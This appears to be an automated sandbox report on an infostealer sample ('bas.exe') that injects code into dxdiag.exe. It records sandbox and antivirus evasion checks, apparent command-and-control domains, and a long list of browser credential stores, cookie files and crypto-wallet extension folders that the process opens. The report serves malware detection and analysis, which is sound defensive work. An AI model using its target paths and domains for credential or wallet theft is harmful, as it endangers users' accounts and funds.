            Source: dxdiag.exe, 00000003.00000003.1505764850.0000000005170000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1481608163.0000000005177000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1505764850.00000000051F2000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1481748678.000000000515A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: bas.exe | ReversingLabs: Detection: 26%
            Source: bas.exe | Virustotal: Detection: 30%
            Source: unknown | Process created: C:\Users\user\Desktop\bas.exe "C:\Users\user\Desktop\bas.exe"
            Source: C:\Users\user\Desktop\bas.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
            Source: C:\Users\user\Desktop\bas.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\bas.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: schannel.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\dxdiag.exe | Section loaded: version.dll
            Source: bas.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: bas.exe | Static file information: File size 13164032 > 1048576
            Source: bas.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xa4ac00
            Source: bas.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x147e00
            Source: bas.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
            Source: bas.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: bas.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: bas.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: bas.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: bas.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: bas.exe | Static PE information: section name: .fptable
            Source: bas.exe | Static PE information: section name: _RDATA
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDCB4E push eax; retf 3_3_02CDCB51
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDC34E push eax; ret 3_3_02CDC351
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDCB5E pushad ; retf 3_3_02CDCB61
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDC35E pushad ; ret 3_3_02CDC361
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDC352 push eax; ret 3_3_02CDC355
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDCB52 push eax; retf 3_3_02CDCB55
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDCB66 push 6802CDCBh; retf 3_3_02CDCB6D
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDC366 push 6802CDC3h; ret 3_3_02CDC36D
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDC362 pushad ; ret 3_3_02CDC365
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CDCB62 pushad ; retf 3_3_02CDCB65
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02D25F76 push edi; retf 3_3_02D25F89
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02D02AFB push esi; retf 3_3_02D02B79
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02D0C8CF pushad ; iretd 3_3_02D0C8D5
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02D02D12 pushfd ; retf 3_3_02D02D29
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CF0CD7 push cs; iretd 3_3_02CF0CDA
            Source: C:\Windows\SysWOW64\dxdiag.exe | Code function: 3_3_02CF06F3 push es; iretd 3_3_02CF06F6
            Source: C:\Windows\SysWOW64\dxdiag.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\dxdiag.exe | System information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\dxdiag.exe TID: 7540 | Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\SysWOW64\dxdiag.exe TID: 7564 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\dxdiag.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051F5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
            Source: dxdiag.exe, dxdiag.exe, 00000003.00000003.1479269620.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620904755.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1579174438.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1558296148.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000002.1631649522.0000000002CF9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: dxdiag.exe, 00000003.00000003.1504968967.00000000051EF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Windows\SysWOW64\dxdiag.exe | Process information queried: ProcessInformation

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\bas.exe | Memory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\bas.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5A
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
            Source: bas.exe, 00000000.00000002.1430754901.00000139AB681000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: volcanohushe.click
            Source: C:\Users\user\Desktop\bas.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000
            Source: C:\Users\user\Desktop\bas.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000
            Source: C:\Users\user\Desktop\bas.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 440000
            Source: C:\Users\user\Desktop\bas.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 443000
            Source: C:\Users\user\Desktop\bas.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 452000
            Source: C:\Users\user\Desktop\bas.exe | Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2AB0008
            Source: C:\Users\user\Desktop\bas.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
            Source: C:\Windows\SysWOW64\dxdiag.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\bas.exe | Code function: 0_2_00007FF64F0D3A6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Windows\SysWOW64\dxdiag.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: dxdiag.exe, 00000003.00000002.1631649522.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000003.00000003.1620904755.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\SysWOW64\dxdiag.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: dxdiag.exe PID: 7524, type: MEMORYSTR
            Source: dxdiag.exe | String found in binary or memory: Wallets/Electrum-LTC
            Source: dxdiag.exe | String found in binary or memory: Wallets/ElectronCash
            Source: dxdiag.exe | String found in binary or memory: Wallets/JAXX New Version
            Source: dxdiag.exe | String found in binary or memory: window-state.json
            Source: dxdiag.exe | String found in binary or memory: ExodusWeb3
            Source: dxdiag.exe | String found in binary or memory: %appdata%\Ethereum
            Source: dxdiag.exe, 00000003.00000003.1558445081.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: dxdiag.exe, 00000003.00000003.1558932047.0000000002CBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Windows\SysWOW64\dxdiag.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
